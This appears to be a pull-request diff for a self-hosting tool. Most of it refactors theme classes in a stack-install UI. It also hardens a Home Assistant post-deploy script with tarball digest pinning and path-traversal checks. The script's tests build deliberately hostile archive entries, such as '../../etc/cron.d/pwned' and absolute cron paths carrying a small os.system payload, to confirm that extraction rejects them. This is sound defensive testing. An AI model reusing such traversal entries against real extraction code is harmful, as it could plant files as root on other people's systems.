+        <ul className="text-xs text-status-warn space-y-1 list-disc list-inside">
           {result.plan.warnings.map((w, i) => <li key={i}>{w}</li>)}
         </ul>
       )}

--- a/packages/frontend/src/components/StackInstallFlow.tsx
+++ b/packages/frontend/src/components/StackInstallFlow.tsx
@@ -78,11 +78,11 @@ export function StackInstallConfigureForm({
     <div className="space-y-4">
       {nodes && nodes.length > 1 && (
         <div>
-          <label className="block text-xs font-medium text-gray-500 dark:text-gray-400 uppercase mb-1">Target Node</label>
+          <label className="block text-xs font-medium text-subtle uppercase mb-1">Target Node</label>
           <select
             value={selectedNode ?? ''}
             onChange={(e) => onSelectNode?.(e.target.value)}
-            className={inputClassName ?? 'w-full p-2 border border-gray-300 dark:border-gray-700 bg-white dark:bg-gray-800 text-gray-900 dark:text-white rounded'}
+            className={inputClassName ?? 'w-full p-2 border border-border bg-surface text-text rounded'}
           >
             <option value="" disabled>Select a node</option>
             {nodes.map(n => (
@@ -95,19 +95,19 @@ export function StackInstallConfigureForm({
       {beforeVariables}
 
       {variables.length === 0 ? (
-        <div className="p-4 bg-green-50 dark:bg-green-900/20 text-green-800 dark:text-green-200 rounded">
+        <div className="p-4 bg-surface text-status-ok rounded">
           No variables found. You can proceed.
         </div>
       ) : (
         <div className="space-y-4">
           {variables.filter(v => v.global).length > 0 && (
             <div>
-              <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wide mb-2">From Settings</p>
+              <p className="text-xs font-medium text-subtle uppercase tracking-wide mb-2">From Settings</p>
               <div className="grid gap-2">
                 {variables.filter(v => v.global).map(v => (
-                  <div key={v.name} className="flex items-center gap-3 p-2 bg-gray-50 dark:bg-gray-800 rounded border border-gray-200 dark:border-gray-700">
-                    <span className="text-sm font-medium text-gray-500 dark:text-gray-400 min-w-[100px]">{v.name}</span>
-                    <span className="text-sm text-gray-700 dark:text-gray-300 font-mono">{v.value}</span>
+                  <div key={v.name} className="flex items-center gap-3 p-2 bg-surface-2 rounded border border-border">
+                    <span className="text-sm font-medium text-subtle min-w-[100px]">{v.name}</span>
+                    <span className="text-sm text-text font-mono">{v.value}</span>
                   </div>
                 ))}
               </div>
@@ -115,13 +115,13 @@ export function StackInstallConfigureForm({
           )}
           {groups.map(group => (
             <div key={group.key}>
-              <h4 className="text-sm font-semibold text-gray-700 dark:text-gray-200 border-b border-gray-200 dark:border-gray-700 pb-1 mb-3">{group.label}</h4>
+              <h4 className="text-sm font-semibold text-text border-b border-border pb-1 mb-3">{group.label}</h4>
               <div className="grid gap-4">
                 {group.variables.map(v => (
                   <div key={v.name}>
-                    <label className="block text-sm font-bold text-gray-700 dark:text-gray-300 mb-1">{v.name}</label>
+                    <label className="block text-sm font-bold text-text mb-1">{v.name}</label>
                     {v.meta?.description && (
-                      <p className="text-xs text-gray-500 dark:text-gray-400 mb-1">{v.meta.description}</p>
+                      <p className="text-xs text-subtle mb-1">{v.meta.description}</p>
                     )}
                     <StackVariableField
                       variable={v}
@@ -191,12 +191,12 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
         />
       )}
 
-      <div className="bg-gray-900 text-gray-100 p-4 rounded-md font-mono text-xs min-h-[12rem] border border-gray-800">
+      <div className="bg-surface-muted text-text p-4 rounded-md font-mono text-xs min-h-[12rem] border border-border">
         {globalLines.map((log, i) => (
           <div key={i} className="mb-1">{log}</div>
         ))}
         {phase === 'installing' && (
-          <div className="flex items-center gap-2 text-gray-400 mt-2">
+          <div className="flex items-center gap-2 text-muted mt-2">
             <Loader2 size={14} className="animate-spin" /> Processing...
           </div>
         )}
@@ -218,7 +218,7 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
                 abortInstall();
               }
             }}
-            className="inline-flex items-center gap-1.5 px-3 py-1.5 text-xs font-medium rounded-md bg-red-600 text-white hover:bg-red-700"
+            className="inline-flex items-center gap-1.5 px-3 py-1.5 text-xs font-medium rounded-md bg-status-fail text-on-accent hover:opacity-80"
           >
             <XCircle size={14} /> Abort install
           </button>
@@ -233,7 +233,7 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
                 reset();
               }
             }}
-            className="inline-flex items-center gap-1.5 px-3 py-1.5 text-xs font-medium rounded-md bg-amber-600 text-white hover:bg-amber-700"
+            className="inline-flex items-center gap-1.5 px-3 py-1.5 text-xs font-medium rounded-md bg-status-warn text-on-accent hover:opacity-80"
           >
             <RefreshCcw size={14} /> Start over
           </button>
@@ -241,9 +241,9 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
       )}
 
       {npmCredPrompt && (
-        <div className="mt-3 p-3 bg-amber-50 dark:bg-amber-900/20 rounded-lg border border-amber-200 dark:border-amber-800">
-          <p className="text-sm font-medium text-amber-800 dark:text-amber-200 mb-2">NPM admin login required</p>
-          <p className="text-xs text-amber-700 dark:text-amber-300 mb-3">
+        <div className="mt-3 p-3 bg-surface rounded-lg border border-border">
+          <p className="text-sm font-medium text-status-warn mb-2">NPM admin login required</p>
+          <p className="text-xs text-status-warn mb-3">
             Nginx Proxy Manager rejected the password this install tried to set — usually because the data volume on this host carries an admin password from a previous install.{' '}
             {npmCredFallback.email || npmCredFallback.password
               ? <>The fields below are pre-filled with the credentials ServiceBay previously had stored (best guess for what NPM&apos;s database still accepts); the wizard&apos;s newly-generated password is <em>not</em> shown here because NPM already rejected it.</>
@@ -255,14 +255,14 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
               type="email"
               value={credEmail}
               onChange={(e) => setCredEmail(e.target.value)}
-              className="w-full px-3 py-2 bg-white dark:bg-gray-900 border border-amber-300 dark:border-amber-700 rounded-md text-sm"
+              className="w-full px-3 py-2 bg-surface border border-border rounded-md text-sm"
               placeholder="NPM admin email"
             />
             <input
               type="text"
               value={credPassword}
               onChange={(e) => setCredPassword(e.target.value)}
-              className="w-full px-3 py-2 bg-white dark:bg-gray-900 border border-amber-300 dark:border-amber-700 rounded-md text-sm font-mono"
+              className="w-full px-3 py-2 bg-surface border border-border rounded-md text-sm font-mono"
               placeholder="NPM admin password"
               autoComplete="off"
               spellCheck={false}
@@ -276,13 +276,13 @@ export function StackInstallProgress({ controller, beforeLog }: ProgressProps) {
               <button
                 onClick={() => { void retryNpmCredentials(credEmail, credPassword); }}
                 disabled={!credPassword}
-                className="flex-1 px-3 py-2 bg-amber-600 text-white rounded-md text-sm font-medium hover:bg-amber-700 disabled:opacity-50"
+                className="flex-1 px-3 py-2 bg-status-warn text-on-accent rounded-md text-sm font-medium hover:opacity-80 disabled:opacity-50"
               >
                 Authenticate &amp; Retry
               </button>
               <button
                 onClick={skipNpmCredentials}
-                className="px-3 py-2 text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200 text-sm"
+                className="px-3 py-2 text-subtle hover:text-text text-sm"
               >
                 Skip
               </button>
@@ -315,36 +315,36 @@ export function StackInstallSummary({ controller, doneFooter }: SummaryProps) {
   return (
     <div className="mt-3 space-y-3">
       {manifest.length > 0 && (
-        <div className="p-3 bg-rose-50 dark:bg-rose-900/20 rounded border border-rose-200 dark:border-rose-800 text-sm">
+        <div className="p-3 bg-surface rounded border border-border text-sm">
           <div className="flex items-center justify-between mb-2">
-            <p className="font-medium text-rose-800 dark:text-rose-200">🔑 Credentials — save now</p>
+            <p className="font-medium text-status-fail">🔑 Credentials — save now</p>
             <button
               type="button"
               onClick={downloadCsv}
-              className="text-xs px-2 py-1 bg-rose-600 hover:bg-rose-700 text-white rounded"
+              className="text-xs px-2 py-1 bg-status-fail hover:opacity-80 text-on-accent rounded"
               title="Download as Bitwarden / Vaultwarden CSV"
             >
               ⬇ Download CSV
             </button>
           </div>
-          <p className="text-xs text-rose-700 dark:text-rose-300 mb-2">
+          <p className="text-xs text-status-fail mb-2">
             Won&apos;t be shown again. Either copy them into your password manager now or use the CSV button: Vaultwarden → Tools → Import → Bitwarden (csv).
           </p>
           <div className="space-y-1.5 font-mono text-xs">
             {manifest.filter(c => c.importance === 'critical').map(c => (
-              <div key={c.service} className="border-l-2 border-rose-300 dark:border-rose-700 pl-2">
-                <div className="font-sans font-medium text-rose-900 dark:text-rose-100">{c.service}</div>
-                <div className="text-rose-700 dark:text-rose-300 break-all">{c.url}</div>
-                <div className="text-rose-600 dark:text-rose-400">{c.username} / {c.password}</div>
+              <div key={c.service} className="border-l-2 border-border pl-2">
+                <div className="font-sans font-medium text-text">{c.service}</div>
+                <div className="text-text break-all">{c.url}</div>
+                <div className="text-text-muted">{c.username} / {c.password}</div>
               </div>
             ))}
           </div>
           {manifest.some(c => c.importance === 'system') && (
             <details className="mt-2 text-xs">
-              <summary className="cursor-pointer text-rose-700 dark:text-rose-300">System / DR secrets ({manifest.filter(c => c.importance === 'system').length})</summary>
+              <summary className="cursor-pointer text-text-muted">System / DR secrets ({manifest.filter(c => c.importance === 'system').length})</summary>
               <div className="mt-1 space-y-1 font-mono">
                 {manifest.filter(c => c.importance === 'system').map(c => (
-                  <div key={c.service} className="text-rose-600 dark:text-rose-400 pl-2">
+                  <div key={c.service} className="text-text-muted pl-2">
                     <span className="font-sans">{c.service}:</span> {c.password}
                   </div>
                 ))}
@@ -541,39 +541,39 @@ function InstallServiceRows({ items, installingNow, deployedNames, perService }:
   };
 
   return (
-    <div className="mb-3 border border-gray-200 dark:border-gray-800 rounded-md overflow-hidden">
+    <div className="mb-3 border border-border rounded-md overflow-hidden">
       {items.map(item => {
         const isDone = deployedSet.has(item.name);
         const isInstalling = installingNow === item.name;
         const lines = perService.get(item.name) || [];
         const isOpen = expanded.has(item.name);
         const statusIcon = isDone
-          ? <CheckCircle2 size={14} className="text-emerald-500 shrink-0" />
+          ? <CheckCircle2 size={14} className="text-status-ok shrink-0" />
           : isInstalling
-            ? <Loader2 size={14} className="animate-spin text-blue-500 shrink-0" />
-            : <Circle size={14} className="text-gray-300 dark:text-gray-600 shrink-0" />;
+            ? <Loader2 size={14} className="animate-spin text-status-info shrink-0" />
+            : <Circle size={14} className="text-text-subtle shrink-0" />;
         const statusText = isDone ? 'Deployed' : isInstalling ? 'Installing…' : 'Pending';
         return (
-          <div key={item.name} className="border-b border-gray-200 dark:border-gray-800 last:border-b-0">
+          <div key={item.name} className="border-b border-border last:border-b-0">
             <button
               type="button"
               onClick={() => toggle(item.name)}
-              className="w-full px-3 py-2 flex items-center gap-2 text-left hover:bg-gray-50 dark:hover:bg-gray-900 transition-colors"
+              className="w-full px-3 py-2 flex items-center gap-2 text-left hover:bg-surface-2 transition-colors"
             >
-              {isOpen ? <ChevronDown size={14} className="text-gray-400 shrink-0" /> : <ChevronRight size={14} className="text-gray-400 shrink-0" />}
+              {isOpen ? <ChevronDown size={14} className="text-text-subtle shrink-0" /> : <ChevronRight size={14} className="text-text-subtle shrink-0" />}
               {statusIcon}
-              <span className="text-sm font-medium text-gray-900 dark:text-gray-100 flex-1 truncate">{item.name}</span>
-              <span className={`text-xs ${isDone ? 'text-emerald-600 dark:text-emerald-400' : isInstalling ? 'text-blue-600 dark:text-blue-400' : 'text-gray-500 dark:text-gray-400'}`}>
+              <span className="text-sm font-medium text-text flex-1 truncate">{item.name}</span>
+              <span className={`text-xs ${isDone ? 'text-status-ok' : isInstalling ? 'text-status-info' : 'text-subtle'}`}>
                 {statusText}
               </span>
               {lines.length > 0 && (
-                <span className="text-[10px] text-gray-400 tabular-nums">{lines.length} ln</span>
+                <span className="text-[10px] text-text-subtle tabular-nums">{lines.length} ln</span>
               )}
             </button>
             {isOpen && (
-              <div className="bg-gray-900 text-gray-100 px-3 py-2 font-mono text-[11px] max-h-48 overflow-y-auto">
+              <div className="bg-surface-muted text-text px-3 py-2 font-mono text-[11px] max-h-48 overflow-y-auto">
                 {lines.length === 0 ? (
-                  <span className="text-gray-500">No log lines yet for {item.name}.</span>
+                  <span className="text-subtle">No log lines yet for {item.name}.</span>
                 ) : (
                   lines.map((line, i) => <div key={i} className="leading-snug">{line}</div>)
                 )}

--- a/packages/frontend/src/components/ui/Input.tsx
+++ b/packages/frontend/src/components/ui/Input.tsx
@@ -1,0 +1,9 @@
+'use client';
+
+import React from 'react';
+
+type InputProps = React.InputHTMLAttributes<HTMLInputElement>;
+
+export function Input({ className = '', ...props }: InputProps) {
+  return <input className={className} {...props} />;
+}

--- a/packages/frontend/src/components/ui/Select.tsx
+++ b/packages/frontend/src/components/ui/Select.tsx
@@ -1,0 +1,11 @@
+'use client';
+
+import React from 'react';
+
+export interface SelectProps extends React.SelectHTMLAttributes<HTMLSelectElement> {
+  children: React.ReactNode;
+}
+
+export function Select({ className = '', children, ...props }: SelectProps) {
+  return <select className={className} {...props}>{children}</select>;
+}

--- a/packages/frontend/src/components/ui/Table.tsx
+++ b/packages/frontend/src/components/ui/Table.tsx
@@ -1,0 +1,11 @@
+'use client';
+
+import React from 'react';
+
+export interface TableProps extends React.TableHTMLAttributes<HTMLTableElement> {
+  children: React.ReactNode;
+}
+
+export function Table({ className = '', children, ...props }: TableProps) {
+  return <table className={className} {...props}>{children}</table>;
+}

--- a/packages/frontend/src/components/ui/Textarea.tsx
+++ b/packages/frontend/src/components/ui/Textarea.tsx
@@ -1,0 +1,9 @@
+'use client';
+
+import React from 'react';
+
+type TextareaProps = React.TextareaHTMLAttributes<HTMLTextAreaElement>;
+
+export function Textarea({ className = '', ...props }: TextareaProps) {
+  return <textarea className={className} {...props} />;
+}

--- a/packages/frontend/src/components/ui/index.ts
+++ b/packages/frontend/src/components/ui/index.ts
@@ -26,6 +26,16 @@ export type { SectionHeadingProps, SectionHeadingTone } from './SectionHeading';
 export { Field } from './Field';
 export type { FieldProps } from './Field';
 
+export { Input } from './Input';
+
+export { Select } from './Select';
+export type { SelectProps } from './Select';
+
+export { Textarea } from './Textarea';
+
+export { Table } from './Table';
+export type { TableProps } from './Table';
+
 export { PageScroll, PageShell, PageScrollRegion } from './PageScroll';
 export type { PageScrollProps } from './PageScroll';
 

--- a/templates/home-assistant/post-deploy.py
+++ b/templates/home-assistant/post-deploy.py
@@ -72,6 +72,16 @@ REQUEST_TIMEOUT = 10.0
 # auth_oidc install
 HA_API = "http://127.0.0.1:8123"
 HA_OIDC_REPO = "christiaangoossens/hass-oidc-auth"
+# SHA-256 of the upstream GitHub tag archive, per release tag we ship a default
+# for (#2453). The download is a plain HTTPS fetch that we then unpack as root,
+# so a compromised upstream release — or anything that can sit in the middle —
+# would otherwise be an arbitrary-write primitive. GitHub's tag archives are
+# byte-stable per tag, so a mismatch means the artifact changed under us and we
+# refuse to extract it. Operators pinning a different HA_OIDC_AUTH_VERSION
+# supply the matching digest via HA_OIDC_AUTH_SHA256.
+HA_OIDC_RELEASE_SHA256 = {
+    "v1.1.0": "92650f0698401e8bc7533065cfd3f2ca5c2074b5ffdb50554898954f32a50412",
+}
 HA_READY_TIMEOUT = 180.0
 HA_READY_INTERVAL = 3.0
 HA_CONTAINER_NAME = "home-assistant-homeassistant"
@@ -1148,6 +1158,27 @@ def _strip_first_component(member_path: str) -> str | None:
     return "/".join(rest[2:])  # path inside auth_oidc/
 
 
+def _safe_member_target(staging: str, rel: str) -> str | None:
+    """Resolve `rel` inside `staging` and return the absolute path to write,
+    or None when the entry would land outside `staging` (#2453).
+
+    `_strip_first_component` only removes the archive's top-level directory;
+    everything after `custom_components/auth_oidc/` comes straight from the
+    tarball, so `../../../etc/cron.d/x` or `/etc/cron.d/x` would otherwise be
+    joined onto the staging dir and written as root. Resolving the candidate
+    and requiring it to still sit under the real staging path rejects both
+    shapes (and any symlinked parent) *before* anything is created."""
+    root = os.path.realpath(staging)
+    if not rel:
+        return root
+    candidate = os.path.realpath(os.path.join(root, rel))
+    if candidate == root:
+        return root
+    if not candidate.startswith(root + os.sep):
+        return None
+    return candidate
+
+
 def _extract_auth_oidc(tar_path: str, target_dir: str) -> None:
     """Extract only the `custom_components/auth_oidc/` subtree from
     the release tarball into `target_dir`. Replaces the directory
@@ -1161,7 +1192,14 @@ def _extract_auth_oidc(tar_path: str, target_dir: str) -> None:
                 rel = _strip_first_component(member.name)
                 if rel is None:
                     continue
-                out_path = os.path.join(staging, rel) if rel else staging
+                out_path = _safe_member_target(staging, rel)
+                if out_path is None:
+                    # A path-traversal entry means the artifact is hostile, not
+                    # merely odd — abort the whole extraction instead of
+                    # installing the rest of it (#2453).
+                    raise tarfile.TarError(
+                        f"refusing tarball entry that escapes the staging dir: {member.name!r}"
+                    )
                 if member.isdir():
                     os.makedirs(out_path, exist_ok=True)
                     continue
@@ -1178,6 +1216,25 @@ def _extract_auth_oidc(tar_path: str, target_dir: str) -> None:
     finally:
         if os.path.isdir(staging):
             shutil.rmtree(staging, ignore_errors=True)
+
+
+def _expected_release_sha256(version: str) -> str | None:
+    """The digest the downloaded tarball must match, or None when we have no
+    pin for this version. An operator bumping HA_OIDC_AUTH_VERSION supplies
+    HA_OIDC_AUTH_SHA256; otherwise we use the shipped map."""
+    override = env("HA_OIDC_AUTH_SHA256").strip().lower()
+    if override:
+        return override
+    return HA_OIDC_RELEASE_SHA256.get(version)
+
+
+def _file_sha256(path: str) -> str:
+    """Chunked so a large artifact never has to be held in memory."""
+    digest = hashlib.sha256()
+    with open(path, "rb") as fh:
+        for chunk in iter(lambda: fh.read(1024 * 1024), b""):
+            digest.update(chunk)
+    return digest.hexdigest()
 
 
 def install_auth_oidc(version: str) -> bool:
@@ -1202,12 +1259,27 @@ def install_auth_oidc(version: str) -> bool:
         log(f"   ⚠️ Could not read existing version stamp: {exc}. Proceeding with install.")
 
     url = f"https://github.com/{HA_OIDC_REPO}/archive/refs/tags/{version}.tar.gz"
+    expected_sha = _expected_release_sha256(version)
+    if not expected_sha:
+        log(f"   ⚠️ No pinned SHA-256 for auth_oidc {version} — refusing to download + unpack an "
+            "unverified artifact as root.")
+        log(f"   Recovery: set HA_OIDC_AUTH_SHA256 to the sha256 of {url} "
+            f"(`curl -sL {url} | sha256sum`), or pin HA_OIDC_AUTH_VERSION back to a version "
+            f"ServiceBay ships a digest for ({', '.join(sorted(HA_OIDC_RELEASE_SHA256))}).")
+        return False
+
     log(f"   Downloading {url}")
     tar_path = ""
     try:
         with tempfile.NamedTemporaryFile(suffix=".tar.gz", delete=False) as tmp:
             tar_path = tmp.name
         urllib.request.urlretrieve(url, tar_path)  # noqa: S310 (pinned URL)
+        actual_sha = _file_sha256(tar_path)
+        if actual_sha != expected_sha:
+            # Verify BEFORE extraction — the extract runs as root (#2453).
+            raise tarfile.TarError(
+                f"sha256 mismatch for {url}: expected {expected_sha}, got {actual_sha}"
+            )
         os.makedirs(os.path.dirname(target), exist_ok=True)
         _extract_auth_oidc(tar_path, target)
     except (urllib.error.URLError, OSError, tarfile.TarError) as exc:

--- a/templates/home-assistant/variables.json
+++ b/templates/home-assistant/variables.json
@@ -36,6 +36,11 @@
     "description": "Pinned release tag of the auth_oidc custom component (https://github.com/christiaangoossens/hass-oidc-auth). post-deploy downloads + extracts the matching tarball into <config>/custom_components/auth_oidc/ on every deploy and skips the network round-trip when the on-disk version stamp already matches. Bump this string and re-deploy to upgrade.",
     "default": "v1.1.0"
   },
+  "HA_OIDC_AUTH_SHA256": {
+    "type": "text",
+    "description": "Optional SHA-256 of the auth_oidc release tarball, checked before post-deploy unpacks it as root. Leave empty for the shipped default version (ServiceBay pins its digest). Required when you bump HA_OIDC_AUTH_VERSION to a version ServiceBay has no pin for — get it with `curl -sL https://github.com/christiaangoossens/hass-oidc-auth/archive/refs/tags/<tag>.tar.gz | sha256sum`. Without a pin the install is skipped rather than trusting an unverified download.",
+    "default": ""
+  },
   "HA_OIDC_ADMIN_GROUP": {
     "type": "text",
     "description": "LLDAP group whose members become Home Assistant admins via auth_oidc's `roles` mapping. Anyone outside this group lands as a regular user. Default matches what `src/app/api/system/lldap/seed/route.ts` actually creates (`admins`, `family`) — earlier defaults named `lldap_admin` / `lldap_strict_readonly` were aspirational and locked every fresh install out of HA with 'not in the correct group'.",

--- a/tests/templates/test_post_deploy.py
+++ b/tests/templates/test_post_deploy.py
@@ -23,6 +23,7 @@ import io
 import json
 import os
 import sys
+import tarfile
 import unittest
 from pathlib import Path
 from typing import Any
@@ -2452,6 +2453,219 @@ class HomeAssistantScript(unittest.TestCase):
             self.assertTrue(m._yaml_is_effectively_empty(body), body)
         for body in ("- id: '1'\n", "morning:\n  sequence: []\n", "# c\n- alias: x\n"):
             self.assertFalse(m._yaml_is_effectively_empty(body), body)
+
+
+class HomeAssistantAuthOidcTarball(unittest.TestCase):
+    """#2453: the auth_oidc release tarball is fetched over the network and
+    unpacked as root. Extraction must not be able to write outside the staging
+    dir, and the artifact must be checked against a pinned hash *before* it is
+    unpacked — otherwise a compromised upstream release (or a MITM) is a
+    root-level arbitrary-write primitive."""
+
+    PREFIX = "hass-oidc-auth-1.1.0"
+
+    @staticmethod
+    def _make_tarball(path: str, entries: dict[str, str]) -> None:
+        """Write a .tar.gz with the member names given VERBATIM — `tf.add()`
+        would normalise a `../` path away, which is exactly the payload we
+        need to keep, so each member is an explicit TarInfo."""
+        import tarfile as tar_mod
+        with tar_mod.open(path, "w:gz") as tf:
+            for name, body in entries.items():
+                data = body.encode("utf-8")
+                info = tar_mod.TarInfo(name)
+                info.size = len(data)
+                tf.addfile(info, io.BytesIO(data))
+
+    @contextlib.contextmanager
+    def _staging_under(self, parent: str):
+        """Pin the script's mkdtemp into `parent` so a `../` payload has a
+        known resolved destination we can assert never appears."""
+        import tempfile as tmp_mod
+        os.makedirs(parent, exist_ok=True)
+        real = tmp_mod.mkdtemp
+        with mock.patch.object(tmp_mod, "mkdtemp", lambda *a, **kw: real(*a, **{**kw, "dir": parent})):
+            yield
+
+    def test_safe_member_target_rejects_escapes(self):
+        """The containment check itself, over the shapes a hostile archive
+        can produce once the top-level dir is stripped."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as staging:
+            for rel in ("../pwned", "../../etc/cron.d/pwned", "a/../../pwned",
+                        "/etc/cron.d/pwned", "/tmp/pwned"):
+                self.assertIsNone(m._safe_member_target(staging, rel), rel)
+            root = os.path.realpath(staging)
+            self.assertEqual(m._safe_member_target(staging, ""), root)
+            self.assertEqual(m._safe_member_target(staging, "a/b.py"), os.path.join(root, "a/b.py"))
+            # `..` that stays inside is fine — only escaping is rejected.
+            self.assertEqual(m._safe_member_target(staging, "a/../b.py"), os.path.join(root, "b.py"))
+
+    def test_extract_rejects_relative_traversal_entry(self):
+        """Hostile payload: a real tarball carrying `../pwned.py` inside
+        custom_components/auth_oidc/. Extraction must abort, and the escaped
+        path must not exist afterwards."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            parent = os.path.join(tmp, "stage")
+            target = os.path.join(tmp, "auth_oidc")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "legit\n",
+                f"{self.PREFIX}/custom_components/auth_oidc/../pwned.py": "os.system('id')\n",
+            })
+            with self._staging_under(parent):
+                with self.assertRaises(tarfile.TarError) as ctx:
+                    m._extract_auth_oidc(tar_path, target)
+            self.assertIn("escapes the staging dir", str(ctx.exception))
+            self.assertFalse(os.path.exists(os.path.join(parent, "pwned.py")))
+            # Aborted, not half-installed.
+            self.assertFalse(os.path.exists(target))
+            self.assertEqual(os.listdir(parent), [])
+
+    def test_extract_rejects_absolute_path_entry(self):
+        """The other shape: an absolute member path, which `os.path.join`
+        would have honoured wholesale (join(staging, '/x') == '/x')."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            target = os.path.join(tmp, "auth_oidc")
+            absolute_victim = os.path.join(tmp, "victim.py")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "legit\n",
+                f"{self.PREFIX}/custom_components/auth_oidc/{absolute_victim}": "pwned\n",
+            })
+            with self.assertRaises(tarfile.TarError):
+                m._extract_auth_oidc(tar_path, target)
+            self.assertFalse(os.path.exists(absolute_victim))
+            self.assertFalse(os.path.exists(target))
+
+    def test_extract_installs_a_legitimate_tarball(self):
+        """The benign case still works: the top-level dir is unwrapped, the
+        auth_oidc subtree lands in target_dir, everything else is skipped."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            target = os.path.join(tmp, "auth_oidc")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/README.md": "not part of the component\n",
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "component\n",
+                f"{self.PREFIX}/custom_components/auth_oidc/manifest.json": '{"domain": "auth_oidc"}\n',
+                f"{self.PREFIX}/custom_components/auth_oidc/views/welcome.py": "view\n",
+            })
+            m._extract_auth_oidc(tar_path, target)
+            with open(os.path.join(target, "__init__.py")) as fh:
+                self.assertEqual(fh.read(), "component\n")
+            with open(os.path.join(target, "views", "welcome.py")) as fh:
+                self.assertEqual(fh.read(), "view\n")
+            self.assertTrue(os.path.isfile(os.path.join(target, "manifest.json")))
+            self.assertFalse(os.path.exists(os.path.join(target, "README.md")))
+
+    # ── pinned-digest verification ────────────────────────────────────────
+
+    def _install_with_fake_download(self, m, tmp, tar_path, env_extra):
+        """Run install_auth_oidc with urlretrieve serving `tar_path`. Returns
+        (result, stdout, download_count)."""
+        import shutil as shutil_mod
+        calls = []
+
+        def fake_urlretrieve(url, dest):
+            calls.append(url)
+            shutil_mod.copyfile(tar_path, dest)
+            return dest, None
+
+        buf = io.StringIO()
+        old = sys.stdout
+        sys.stdout = buf
+        try:
+            with run_with_env({"DATA_DIR": tmp, **env_extra}):
+                with mock.patch.object(m.urllib.request, "urlretrieve", fake_urlretrieve):
+                    result = m.install_auth_oidc(env_extra.get("HA_OIDC_AUTH_VERSION", "v1.1.0"))
+        finally:
+            sys.stdout = old
+        return result, buf.getvalue(), len(calls)
+
+    @staticmethod
+    def _sha256_of(path: str) -> str:
+        import hashlib
+        h = hashlib.sha256()
+        with open(path, "rb") as fh:
+            h.update(fh.read())
+        return h.hexdigest()
+
+    def test_install_rejects_tarball_whose_digest_does_not_match_the_pin(self):
+        """A swapped artifact (compromised release / MITM) must be refused
+        before extraction — nothing lands in the config dir."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "swapped\n",
+            })
+            result, out, downloads = self._install_with_fake_download(
+                m, tmp, tar_path,
+                {"HA_OIDC_AUTH_SHA256": "0" * 64, "HA_OIDC_AUTH_VERSION": "v1.1.0"},
+            )
+            self.assertFalse(result)
+            self.assertIn("sha256 mismatch", out)
+            self.assertEqual(downloads, 1)
+            self.assertFalse(os.path.exists(
+                os.path.join(tmp, "home-assistant", "homeassistant", "custom_components", "auth_oidc")))
+
+    def test_install_refuses_a_version_with_no_pinned_digest(self):
+        """An unpinned version is never even downloaded — no unverified
+        artifact gets unpacked as root."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "x\n",
+            })
+            result, out, downloads = self._install_with_fake_download(
+                m, tmp, tar_path, {"HA_OIDC_AUTH_VERSION": "v9.9.9-unpinned"},
+            )
+            self.assertFalse(result)
+            self.assertEqual(downloads, 0)
+            self.assertIn("No pinned SHA-256", out)
+            self.assertIn("HA_OIDC_AUTH_SHA256", out)
+
+    def test_install_accepts_a_tarball_matching_the_pin(self):
+        """Happy path: digest matches → component installed + version stamped."""
+        m = load_script("home-assistant")
+        import tempfile
+        with tempfile.TemporaryDirectory() as tmp:
+            tar_path = os.path.join(tmp, "release.tar.gz")
+            self._make_tarball(tar_path, {
+                f"{self.PREFIX}/custom_components/auth_oidc/__init__.py": "component\n",
+            })
+            result, _out, downloads = self._install_with_fake_download(
+                m, tmp, tar_path,
+                {"HA_OIDC_AUTH_SHA256": self._sha256_of(tar_path), "HA_OIDC_AUTH_VERSION": "v1.1.0"},
+            )
+            self.assertTrue(result)
+            self.assertEqual(downloads, 1)
+            installed = os.path.join(tmp, "home-assistant", "homeassistant",
+                                     "custom_components", "auth_oidc")
+            with open(os.path.join(installed, "__init__.py")) as fh:
+                self.assertEqual(fh.read(), "component\n")
+            with open(os.path.join(installed, ".sb_installed_version")) as fh:
+                self.assertEqual(fh.read().strip(), "v1.1.0")
+
+    def test_default_version_digest_is_pinned_in_the_script(self):
+        """The shipped default must not depend on an operator-supplied digest
+        — variables.json's HA_OIDC_AUTH_VERSION default needs a pin."""
+        m = load_script("home-assistant")
+        with open(TEMPLATES_DIR / "home-assistant" / "variables.json") as fh:
+            declared = json.load(fh)
+        default_version = declared["HA_OIDC_AUTH_VERSION"]["default"]
+        self.assertIn(default_version, m.HA_OIDC_RELEASE_SHA256)
+        self.assertRegex(m.HA_OIDC_RELEASE_SHA256[default_version], r"^[0-9a-f]{64}$")
 
 
 class ClaudeDevScript(unittest.TestCase):


### PR DESCRIPTION
Batch of 8 issues/units closed via the autoloop pipeline, including 3 severe security fixes from a fresh codebase eval.

**Security (from the 2026-07-29 codebase eval):**
